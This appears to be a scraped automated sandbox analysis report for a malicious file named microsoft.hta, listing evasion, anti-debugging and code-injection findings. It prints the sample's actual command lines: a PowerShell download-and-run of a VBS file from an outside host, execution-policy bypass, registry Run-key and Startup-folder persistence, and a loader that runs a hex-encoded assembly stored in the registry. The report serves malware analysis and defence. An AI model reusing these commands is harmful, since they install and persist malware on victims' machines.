Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\wscript.exe	Window / User API: threadDelayed 843			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5767

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748	Thread sleep time: -922337203685477s >= -60000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1300	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2268	Thread sleep count: 843 > 30	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2268	Thread sleep time: -50580000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2260	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1404	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 2712	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216	Thread sleep count: 5767 > 30
Source: C:\Windows\System32\wscript.exe TID: 3224	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 3356	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100	Thread sleep time: -922337203685477s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 3528	Thread sleep time: -60000s >= -60000s

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: wscript.exe, 0000000A.00000003.1678864821.025AB000.00000004.sdmp

Binary or memory string: iRWxIQ0VuQVFJVGFXeGx1UkhLd1ZOTFZWZyINCklmIFBIeWtVanl0a1dwUEVlSXlPYU9NdEpqID0gIkVsSENFbkFRSVRhV3hsdVJIS3dWTkxWVmciIFRoZW4NCkVuZCBJZg0KRm9yIGJGTEdNTEZKRnVBcnJ5Rk5vRE1uWXp2ID0gMTU3NiB0by

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for debuggers (devices)

Show sources

Source: C:\Windows\System32\mshta.exe

File opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\mshta.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 23.105.131.191 5478
Source: C:\Windows\System32\wscript.exe	Network Connect: 194.5.98.10 136	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 166.62.121.61 443	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\wscript.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000 protect: page read and write
Source: C:\Windows\System32\wscript.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000 protect: page read and write
Source: C:\Windows\System32\wscript.exe	Memory allocated: unknown base: 50000 protect: page read and write

Bypasses PowerShell execution policy

Show sources

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\wscript.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000
Source: C:\Windows\System32\wscript.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50020
Source: C:\Windows\System32\wscript.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD7238
Source: C:\Windows\System32\wscript.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000
Source: C:\Windows\System32\wscript.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50020
Source: C:\Windows\System32\wscript.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFDF238
Source: C:\Windows\System32\wscript.exe	Memory written: unknown base: 50000
Source: C:\Windows\System32\wscript.exe	Memory written: unknown base: 50020
Source: C:\Windows\System32\wscript.exe	Memory written: unknown base: 7FFDE238

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report microsoft.hta

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion: